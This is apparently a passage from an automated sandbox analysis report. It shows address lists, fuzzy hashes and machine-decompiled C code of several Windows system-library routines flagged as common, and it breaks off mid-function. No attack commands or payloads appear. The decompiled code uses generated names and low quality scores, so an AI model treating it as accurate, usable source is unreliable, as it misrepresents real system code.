0x05407a6a
0x05407a6c
0x05407a6e
0x054079cb
0x054079cb
0x054079ce
0x054079d0
0x05407a98
0x05407a9b
0x05407a9b
0x05407a9e
0x05407aa1
0x05407bbe
0x05407bbe
0x05407bc0
0x05407be0
0x05407be0
0x05407a01
0x05407a01
0x05407a05
0x05407a07
0x05407a15
0x05407a15
0x05407a1a
0x00000000
0x05407a1a
0x05407bc2
0x05407bc6
0x05407bc9
0x05407bcd
0x05407bcf
0x054079e6
0x054079e6
0x054079eb
0x054079eb
0x054079ef
0x054079f1
0x00000000
0x00000000
0x054079f3
0x054079f5
0x054079ff
0x054079ff
0x00000000
0x054079ff
0x054079f7
0x054079fd
0x00000000
0x00000000
0x00000000
0x054079fd
0x05407bd5
0x05407bd8
0x00000000
0x00000000
0x05407ba9
0x05407bac
0x05407bb0
0x05407bb1
0x05407bb1
0x05407bb6
0x00000000
0x05407bb6
0x05407aa7
0x05407aaa
0x00000000
0x00000000
0x05407ab2
0x05407ab3
0x05407ab5
0x05407aec
0x05407aef
0x05407b25
0x05407b28
0x05407b62
0x05407b64
0x05407b8f
0x05407b92
0x05407b96
0x05407b98
0x00000000
0x00000000
0x05407b9e
0x05407b9f
0x05407ba3
0x00000000
0x05407ba3
0x05407b66
0x05407b68
0x05407ae2
0x05407ae2
0x00000000
0x05407ae2
0x05407b6e
0x05407b72
0x05407b75
0x05407b81
0x05407b85
0x05407b87
0x00000000
0x00000000
0x05407b31
0x05407b34
0x05407b3c
0x05407b45
0x05407b46
0x05407b4f
0x05407b51
0x05407b57
0x05407b59
0x05407b59
0x00000000
0x05407b59
0x05407b77
0x00000000
0x05407b77
0x05407b2a
0x00000000
0x05407b2a
0x05407af1
0x05407af3
0x00000000
0x00000000
0x05407afb
0x05407afc
0x05407afe
0x00000000
0x00000000
0x05407b00
0x05407b03
0x00000000
0x00000000
0x05407b05
0x05407b09
0x05407b0d
0x05407b0f
0x00000000
0x00000000
0x05407b18
0x05407b1d
0x00000000
0x05407b1d
0x05407ab7
0x05407ab9
0x00000000
0x00000000
0x05407abf
0x05407ac1
0x00000000
0x00000000
0x05407ac3
0x05407ac6
0x00000000
0x00000000
0x05407ac8
0x05407acc
0x05407ad0
0x05407ad2
0x00000000
0x00000000
0x05407adb
0x00000000
0x05407adb
0x054079d6
0x054079d9
0x054079dc
0x05407a91
0x05407a94
0x00000000
0x05407a94
0x054079e2
0x00000000
0x054079e2
0x05407a74
0x05407a7a
0x00000000
0x00000000
0x05407a8a
0x05407a21
0x05407a21
0x00000000
0x05407a21
0x0539c650
0x0539c651
0x0539c656
0x0539c65c
0x0539c65d
0x0539c663
0x0539c664
0x0539c66a
0x0539c66e
0x054079c5
0x054079c7
0x00000000
0x054079c7
0x0539c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb28757508a339296a2b4e26b4147d8b9260e9f696ccf74dd92aab7f2abcf56
Instruction ID: 1b6dfc1cd43d9a55765515360f3acdfce60e24acd786e42e4a350828eb275d58
Opcode Fuzzy Hash: efb28757508a339296a2b4e26b4147d8b9260e9f696ccf74dd92aab7f2abcf56
Instruction Fuzzy Hash: D4817D756082459BDB25DE14C880EBBB3AAFB84354F24586BED459B381D330ED41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0542B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0542B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x5487b9c; // 0x0
				_t124 = L053B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E053D9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E053D95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E053D95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L053B77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E053D9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E053D95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x5487b9c; // 0x0
									_t92 = L053B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E053D9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0539A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0542E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0542E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E053D95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0542b8d9
0x0542b8e4
0x00000000
0x0542b8e6
0x0542b8f3
0x0542b8f5
0x0542b8f5
0x0542b8f8
0x0542b920
0x0542b924
0x0542b936
0x0542b939
0x0542b93d
0x0542b948
0x0542b9a0
0x0542b9a0
0x0542b9a4
0x0542b9bf
0x0542b9c4
0x0542b9c6
0x0542b9cd
0x0542b9d1
0x0542bad4
0x0542bad8
0x0542bada
0x0542badc
0x0542badc
0x0542badf
0x0542bae0
0x0542bae2
0x0542bae4
0x0542baec
0x0542baee
0x0542baf0
0x0542baf0
0x0542baec
0x0542bafb
0x0542bafc
0x0542bafe
0x0542bb01
0x0542bb01
0x00000000
0x0542bb06
0x0542b9d7
0x0542b9db
0x0542b9db
0x0542b9de
0x0542b9de
0x0542b9e4
0x0542b9e7
0x0542b9ea
0x0542b9ec
0x0542b9ef
0x0542b9f3
0x0542ba1b
0x0542ba1b
0x0542ba23
0x0542ba24
0x0542ba27
0x0542ba2a
0x0542ba2b
0x0542ba2e
0x0542ba30
0x0542ba37
0x0542ba3f
0x0542ba9c
0x0542baa2
0x0542bb13
0x0542bb15
0x0542baae
0x0542baae
0x0542bab3
0x0542bab5
0x0542baba
0x0542bac8
0x0542bac8
0x0542baba
0x0542bacd
0x0542bacf
0x00000000
0x0542bacf
0x0542bb1a
0x00000000
0x0542bb1c
0x0542baa7
0x0542bb11
0x00000000
0x0542bb11
0x0542baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0542ba41
0x0542ba41
0x0542ba41
0x0542ba58
0x0542ba5d
0x0542ba62
0x00000000
0x00000000
0x0542ba64
0x0542ba67
0x0542ba68
0x0542ba69
0x0542ba6c
0x0542ba6f
0x0542ba71
0x0542ba78
0x0542ba80
0x00000000
0x00000000
0x0542ba90
0x0542ba90
0x0542ba97
0x00000000
0x0542ba97
0x0542b9f5
0x0542b9f7
0x0542b9f7
0x0542b9fa
0x0542ba03
0x0542ba07
0x0542ba0c
0x0542ba10
0x0542ba17
0x00000000
0x0542b9f7
0x0542b9a6
0x0542b9a8
0x0542b9af
0x0542b9b3
0x00000000
0x00000000
0x0542b9b9
0x00000000
0x0542b9b9
0x0542b94d
0x0542b98f
0x0542b995
0x0542b999
0x0542b960
0x0542b967
0x0542b968
0x0542b96a
0x00000000
0x0542b96a
0x0542b99b
0x0542b99e
0x00000000
0x00000000
0x00000000
0x0542b99e
0x0542b951
0x0542b954
0x0542b95a
0x0542b95e
0x0542b972
0x0542b979
0x0542b97d
0x0542b97f
0x0542b980
0x0542b982
0x0542b984
0x00000000
0x0542b984
0x00000000
0x0542b926
0x00000000
0x0542b926

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad93416e24ddb154d7b56e99cd355e546d99c8f09267062e4d0b187651d6d028
Instruction ID: 723a89d3c4ac3f9c2714e1a34e5499b76a4e48dafc2a79f0d122803f157605e9
Opcode Fuzzy Hash: ad93416e24ddb154d7b56e99cd355e546d99c8f09267062e4d0b187651d6d028
Instruction Fuzzy Hash: 78712432200B21AFD732CF14C849FA6B7F6FF40720F54456AE6568B6A0DBB5E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053952A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E053AEEF0(0x54879a0);
					_t104 =  *0x5488210; // 0x32f2bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E053AEB70(_t93, 0x54879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E053D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E053AEEF0(0x54879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E053AEB70(0, 0x54879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x32f2bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E053CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E053AEEF0(0x54879a0);
									__eflags =  *0x5488210 - _t104; // 0x32f2bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x5488210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E05414888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E053AEB70(_t95, 0x54879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E053D95D0();
											L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E053D95D0();
											L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E053AEB70(_t93, 0x54879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E053D95D0();
										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E053D95D0();
										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E053CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x053952a5
0x053952ad
0x053952b0
0x053952b3
0x053952b7
0x053952ba
0x053952bf
0x053952c4
0x053952cc
0x00000000
0x00000000
0x053952ce
0x053952d9
0x053952dd
0x053952e7
0x053952f7
0x053952f9
0x053952fd
0x053f0dcf
0x053f0dd5
0x053f0dd6
0x053f0dd7
0x053f0dd8
0x053f0dd9
0x053f0dde
0x053f0ddf
0x053f0de0
0x053f0de1
0x053f0de2
0x053f0de5
0x053f0dea
0x053f0dec
0x053f0f60
0x053f0f64
0x053f0f70
0x053f0f76
0x053f0f79
0x053f0f79
0x00000000
0x053f0f64
0x053f0df2
0x053f0df7
0x053f0e04
0x053f0e0d
0x053f0e0d
0x053f0e10
0x053f0e1a
0x053f0e1c
0x053f0e4c
0x053f0e52
0x053f0e61
0x053f0e67
0x053f0e6b
0x053f0e70
0x053f0e76
0x053f0ed7
0x053f0edc
0x053f0ee0
0x053f0ee6
0x053f0eea
0x053f0eed
0x053f0ef0
0x053f0ef3
0x053f0ef6
0x053f0ef9
0x053f0efe
0x053f0f01
0x053f0f01
0x053f0f0b
0x053f0f12
0x053f0f16
0x053f0f18
0x053f0f1b
0x053f0f2c
0x053f0f31
0x053f0f31
0x053f0f35
0x053f0f39
0x053f0f3a
0x053f0f3c
0x053f0f3f
0x053f0f50
0x053f0f55
0x053f0f55
0x053f0f59
0x053952eb
0x053952f1
0x053952f1
0x053f0e7d
0x053f0e84
0x053f0e88
0x053f0e8a
0x053f0e8d
0x053f0e9e
0x053f0ea3
0x053f0ea3
0x053f0ea7
0x053f0eaf
0x053f0eb3
0x053f0eb9
0x053f0eb9
0x053f0ebc
0x053f0ecd
0x053f0ecd
0x00000000
0x053f0eb3
0x053f0e21
0x053f0e2b
0x053f0e2f
0x053f0e30
0x053f0e3a
0x053f0e3f
0x053f0e41
0x00000000
0x00000000
0x053f0e47
0x00000000
0x053f0e47
0x053f0df9
0x053f0dfe
0x00000000
0x00000000
0x00000000
0x053f0dfe
0x05395303
0x05395307
0x00000000
0x05395309
0x00000000
0x05395309
0x05395307
0x053952e9
0x053952e9
0x00000000
0x053952e9
0x0539530e
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 995848f2585a0c55f14c1a2bd0e30e5f24dd9c7a8632f697ed16c4faf8a45c94
Instruction ID: d738525db330b3d30e5c1a95ae1dbd7aa7eb40a151045ffb7e41db4eb8462277
Opcode Fuzzy Hash: 995848f2585a0c55f14c1a2bd0e30e5f24dd9c7a8632f697ed16c4faf8a45c94
Instruction Fuzzy Hash: C0511172209341ABD725EF68C849B6BFBE9FF44710F10091EF5A687651E7B0E844C791

Uniqueness

Uniqueness Score: -1.00%

Function 053AEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E053AEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E05399080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E05392D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x053aef4b
0x053aef4d
0x053aef57
0x053af0bd
0x053af0c2
0x053af0d2
0x053af0d2
0x053af0c2
0x053aef5d
0x053aef5f
0x053aef67
0x053aef6a
0x053aef6d
0x053aef74
0x053aef7f
0x053aef82
0x053aef82
0x053aef86
0x053aef88
0x053aef8c
0x053aef8f
0x053aef8f
0x053aef8f
0x00000000
0x053aef91
0x053aef93
0x053aefc4
0x053aefc4
0x053aefc4
0x053aefca
0x053aefd0
0x053af0a6
0x00000000
0x00000000
0x053af0af
0x053fbb06
0x053fbb0a
0x053af0b5
0x053af0b5
0x053af0b5
0x053af0b5
0x00000000
0x053aefd6
0x053aefd9
0x053af0de
0x053af0e2
0x053aefdf
0x053aefdf
0x053aefdf
0x053aefe5
0x053fbafc
0x053fbafc
0x053aefe5
0x053aefeb
0x053aefed
0x053af00f
0x053af011
0x053af01a
0x053af01d
0x053af021
0x053af028
0x053af029
0x053af029
0x053af02c
0x00000000
0x053af02c
0x053aeff3
0x053aeff9
0x053af0ea
0x053af0ed
0x053af0ef
0x00000000
0x053af0ef
0x053af003
0x053fbb12
0x053af045
0x053af049
0x053af051
0x053af09e
0x053af0a0
0x053af0a0
0x053af09e
0x053af053
0x053af064
0x053af064
0x053af06b
0x053fbb1a
0x053fbb1a
0x053af071
0x053af071
0x053af07d
0x053af082
0x053af08f
0x053af08f
0x053af009
0x053af00d
0x00000000
0x053af00d
0x053aefd0
0x053aef97
0x053aefa5
0x053aefaa
0x00000000
0x053aefac
0x053aefac
0x053aefac
0x00000000
0x053aefb2
0x053af036
0x053af03a
0x053af040
0x053af090
0x00000000
0x053af092
0x053af042
0x00000000
0x053af042
0x053aefb7
0x053aefb9
0x053aefbc
0x053aefb0
0x053aefb0
0x00000000
0x053aefbe
0x053aefbe
0x053aefc1
0x00000000
0x053aefc1
0x053aefbc
0x053aefaa
0x053aef91

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: af6a31c5398f86690ab1413389c2d9d7c3c4c37ab356456120cd9220978374a8
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 02513536E04249DFDB24CB68C0D4BBEFBB6FF05304F1981A8D45593281C3B5A988D761

Uniqueness

Uniqueness Score: -1.00%

Function 0546740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0546740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E053ED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E053DF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L053B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L053B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E053DF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L053B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
